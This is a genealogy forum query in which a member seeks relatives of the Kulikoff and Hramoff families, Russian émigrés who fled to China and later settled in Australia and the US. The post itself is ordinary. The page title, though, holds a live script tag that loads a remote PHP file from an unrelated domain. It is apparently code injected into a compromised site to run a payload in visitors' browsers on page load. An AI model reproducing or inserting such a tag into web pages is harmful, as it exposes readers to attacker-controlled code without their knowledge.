Looking for any one related to or having any information on the families The Kulikoffs, related to Seregeyeffs, and the Hramoffs<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script> :: FamilyTreeCircles.com Genealogy
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Looking for any one related to or having any information on the families The Kulikoffs, related to Seregeyeffs, and the Hramoffs

Query by mcraig2944

Looking for any one related to or having any information about two families. Kulikoff, whose father, I believe the first name of Leo, whose family fled to China because of the Russian Revolution. He had three sons, born in Uramchi China, Victor, William and Leo. Father killed, mother and sons immigrated to Australia after WWII. And Hramoff, also fled to China. Father was a doctor, died of TB in China. Mother was a seamstress, had two daughters, Tatiana and Helen. After WWII mother and Helen immigrated to US. Tatiana to Australia. Helen married Bob Powers. Tatiana married Victor Kulikoff. They immigrated to US and had one daughter, Marie. Most individuals I know have passed away. No one spoke much about their families. I guessed my paternal grandfathers name, my father used Leo as his middle name. I believe my dad said his father was in the Imperial Calvary.I do not know his mother's first or maiden name. I seem to remember my father saying his father had a brother who had remained in Russia, but do not have his name or any other info. I do not know my maternal grandfather's first name and do not know my maternal grandmothers maiden name, I do not know if they had any siblings, etc. I know that Father George Larin, in Nyak, NY is my mother's cousin. We are somehow related to the Sergeyeff family in Australia. I would like to know about our family, to pass this info on to my children. Any info would be deeply appreciated. Thank you.

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by mcraig2944 Profile | Research | Contact | Subscribe | Block this user
on 2012-05-27 15:28:33

mcraig2944 has been a Family Tree Circles member since May 2012.

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